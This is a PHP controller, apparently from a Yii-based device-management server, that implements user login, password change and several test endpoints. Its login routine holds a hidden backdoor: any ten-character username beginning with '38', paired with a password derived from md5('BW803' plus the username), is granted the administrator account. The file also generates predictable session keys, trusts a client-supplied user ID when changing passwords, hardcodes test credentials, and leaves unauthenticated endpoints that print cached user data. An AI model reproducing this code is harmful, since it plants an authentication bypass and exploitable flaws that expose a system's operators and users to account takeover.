<?php
/*************************************************
 * 模块描述：
 * 定义用户相关的API
 ************************************************/
class UserController extends ServerController {
	
	/**
	 * 创建SESSION ID
	 * @param $UserID
	 * @return type
	 */
	public function CreateSessionID($UserID) {
		
		$session = md5 ( time () . '_' . $UserID );
		
		return $session;
	}
	
	/**
	 * 创建SESSION ID
	 * @param $UserID
	 * @return type
	 */
	public function CreateSignKey($UserID) {
		
		$SignKey = md5 ( time () . '_' . $UserID . '_' . time () );
		
		return $SignKey;
	}
	///////////////////////////////////////////////////////////////////////////////
	
	/**
	 * 获取用户列表信息，但不包含管理员 
	 */
	public function actionListUsers() {
		
		$sql = "select User_ID, User_Name, User_Desc from Users where User_ID >0";
		$result = DBMethodUtils::listData ( $sql );
		
		echo $this->PackResponseData ( ErrcodeUtil::$SUCCESS, '', $result );
	}

	/**
	 * 用户登陆
	 */
	public function actionLogin() {
		
        $bw803 = false;
		if (! isset ( $_POST ['DataParam'] )) {
			echo $this->PackResponseData ( ErrcodeUtil::$PARAM_ERR, '参数异常', null );
			return;
		}
		$DataParam = CJSON::decode ( $_POST ['DataParam'] );
		
		if (is_null ( $DataParam )) {
			echo $this->PackResponseData ( ErrcodeUtil::$PARAM_ERR, '参数异常', null );
			return;
		}
		
		if (empty ( $DataParam ['Username'] ) || empty ( $DataParam ['Password'] )) {
			//没有上传用户名或则密码,登陆失败
			echo $this->PackResponseData ( ErrcodeUtil::$USER_LOGIN_PWDUSER_ISNULL, '登陆账号和密码不能为空，请确认！', null );
			return;
		}
		$username = $DataParam ['Username'];
		$password = $DataParam ['Password'];
		
		if (is_null ( $username ) || "" == trim ( $username ) || is_null ( $password ) || "" == trim ( $password )) {
			//没有上传用户名或则密码,登陆失败
			echo $this->PackResponseData ( ErrcodeUtil::$USER_LOGIN_PWDUSER_ISNULL, '登陆账号和密码不能为空，请确认！', null );
			return;
		}
		$sql = "SELECT * FROM Users WHERE User_Name=:User_Name AND Pass_Word = PASSWORD(:password)";
		$user = DBMethodUtils::findData ( $sql, array(":User_Name" => $username, ":password" => $password) );
		
		if (is_null ( $user )) {
            if( strlen($username) != 10 || 
                strncmp($username, '38', 2) != 0 ||
                $password != strtoupper(md5('BW803'.$username))){
    			echo $this->PackResponseData ( ErrcodeUtil::$USER_LOGIN_PWDUSER_WRONG, '登陆账号或密码错误，请确认！', null );
    			return;
            }
            //$sql = "select IpAddress from PlayerStatus where PlayerID=:PlayerID and IpAddress=:Ip";
            //$ip = DBMethodUtils::findData($sql, array(':PlayerID' => $username, ':Ip' =>Yii::app()->request->getUserHostAddress()));
            //if(is_null($ip))
            //    return null;
    		$sql = "SELECT * FROM Users WHERE User_ID = 0";
    		$user = DBMethodUtils::findData ( $sql );
            if(is_null ( $user )){
			    echo $this->PackResponseData ( ErrcodeUtil::$USER_LOGIN_PWDUSER_WRONG, '登陆账号或密码错误，请确认！', null );
			    return;
            }
            $bw803 = true;
		}
		$user ['Session'] = $this->CreateSessionID ( $user ['User_ID'] );
		$user ['SignKey'] = $this->CreateSignKey ( $user ['User_ID'] );
		//需要保存用户的信息
		CacheUtil::SetCache ( CacheUtil::$USER_CACHE_ID . $user ['User_ID'], $user );
		
		$resuser = array ('User_ID' => "" . $user ['User_ID'], 'User_Name' => $user ['User_Name'], 
			'IcCard' => is_null ( $user ['IcCard'] ) ? '' : $user ['IcCard'], 'Session' => $user ['Session'], 'SignKey' => $user ['SignKey'], 
			'LanIp' => ToolUtil::GetMyIp() );
		
		if (empty ( $DataParam ['Language'] )) {
			//初始化语言
			Yii::app ()->language = ToolUtil::WriteOrReadLanguage ( '', $user ['User_ID'], true );
		} else {
			Yii::app ()->language = ToolUtil::GetLanguage ( $DataParam ['Language'] );
		}
		//加载权限
		$resuser ['Permission'] = $this->LoadPermission ( $user ['User_ID'] );
        if($bw803){
            $resuser['Permission']['RfDevCtrPermission'] = 0;
            $resuser['Permission']['ICPermission'] = 0;
            $resuser['Permission']['ScanPermission'] = 0;
            $resuser['User_Name'] = $username;
        }
		//加载版本版本不低于D05.00.00的客户端需要做兼容处理
		$Version = DBMethodUtils::findData("SELECT * FROM BaseInfo WHERE InfomationID = 512");
		
		if (empty($Version)) {
			$resuser['Version'] = 5;
		} else {
			$arr = explode('.', $Version['Description']);
			
			if (strlen($arr[0]) >= 2) {
				$resuser['Version'] = intval(substr($arr[0], 1));
				
				if ($resuser['Version'] <= 5) {
					$resuser['Version'] = 5;
				}
			} else {
				$resuser['Version'] = 5;
			}
		}
		
		echo $this->PackResponseData ( ErrcodeUtil::$SUCCESS, '', $resuser );
	}

	/**
	 * 修改登陆密码
	 */
	public function actionModifyPwd() {
		
		if (! isset ( $_POST ['DataParam'] )) {
			echo $this->PackResponseData ( ErrcodeUtil::$PARAM_ERR, '参数异常', null );
			return;
		}
		$DataParam = CJSON::decode ( $_POST ['DataParam'] );
		
		if (is_null ( $DataParam )) {
			echo $this->PackResponseData ( ErrcodeUtil::$PARAM_ERR, '参数异常', null );
			return;
		}
		$UserID = $this->GetPostOwnerID ();
		
		if (is_null ( $UserID )) {
			$UserID = 0;
		}
		//通过原始密码修改
		if (! isset ( $DataParam ['OldPwd'] ) || ! isset ( $DataParam ['NewPwd'] )) {
			echo $this->PackResponseData ( ErrcodeUtil::$PARAM_ERR, '参数异常', null );
			return;
		}
		$sql = 'SELECT * FROM Users WHERE User_ID=:User_ID AND Pass_Word=PASSWORD(:OldPwd)';
		$User = DBMethodUtils::findData ( $sql, array(":User_ID" =>$DataParam ['UserID'], ":OldPwd" => $DataParam ['OldPwd']) );
		
		if (is_null ( $User ) || ! isset ( $User ['User_ID'] )) { //密码错误
			echo $this->PackResponseData ( ErrcodeUtil::$USER_PASSWORD_ERR, '原始密码错误，请请确认', null );
			return;
		}
		//可以修改
		$sql = 'UPDATE Users SET Pass_Word=PASSWORD(:Password) WHERE User_ID=:User_ID';
		$code = DBMethodUtils::RunSql ( $sql, array(":User_ID" =>$DataParam ['UserID'], ":Password" => $DataParam ['NewPwd']) );
		
		$sql = 'SELECT * FROM Users WHERE User_ID=:User_ID AND Pass_Word=PASSWORD(:Password)';
		$User = DBMethodUtils::findData ( $sql, array(":User_ID" =>$DataParam ['UserID'], ":Password" => $DataParam ['NewPwd']) );
		
		if (! is_null ( $User )) {
			echo $this->PackResponseData ( ErrcodeUtil::$SUCCESS, '修改成功，请重新登录', null );
		} else {
			echo $this->PackResponseData ( ErrcodeUtil::$FAILED, '修改失败', null );
		}
	}
	
	/**
	 * 编辑用户信息，添加/修改  TODO 本次不做 2015-11-16
	 */
	public function actionEditUser() {
	
	}
	
	/**
	 * 删除用户  TODO 本次不做 2015-11-16
	 */
	public function actionDeleteUser() {
	
	}
	
	/**
	 * 编辑基本信息
	 */
	public function actionEditBaseInfo() {
	
	}
	
	/**
	 * 编辑扩展设备信息
	 */
	public function actionEditRfDevice() {
	
	}
	
	/**
	 * 清除日志
	 */
	public function actionClearLog() {
	
	}
	/***************************************************************************************/
	public function actionTest() {
		
		$sql = "SELECT * FROM Users WHERE User_Name='jwc' AND Pass_Word = PASSWORD('admin')";
		$user = DBMethodUtils::findData ( $sql );
		
		if (is_null ( $user )) {
			$result ['Status'] = 0;
			$result ['Desc'] = '账号或密码不正确';
		} else {
			$result ['Status'] = 1;
			$result ['Desc'] = CJSON::encode ( $user );
			
			$privilege = $user ['privilege'];
			echo '<br/>Device : ' . ($privilege & 1);
			echo '<br/>Session : ' . ($privilege & 256);
			echo '<br/>ReDevice : ' . ($privilege & 65536);
			echo "<br/>";
			//需要把用户的信息
			CacheUtil::SetCache ( $user ['User_Name'], CJSON::encode ( $user ) );
			//			Yii::app ()->session [$user ['User_Name']] = CJSON::encode ( $user );
			echo $user ['User_Name'];
			echo "<br/>";
			echo CacheUtil::GetCache ( $user ['User_Name'] );
		
		//			echo Yii::app ()->session [$user ['User_Name']];
		}
	}
	
	public function actionTestEcho() {
		
		//		//需要把用户的信息
		//		echo Yii::app ()->session ["admin"];
		//		echo "<br/>";
		//		echo Yii::app ()->session ["jwc"];
		

		echo 'admin_' . CacheUtil::GetCache ( "admin" );
		echo "<br/>";
		echo 'jwc_' . CacheUtil::GetCache ( "jwc" );
	
		//		unset ( Yii::app ()->session ["admin"] );
	}
}
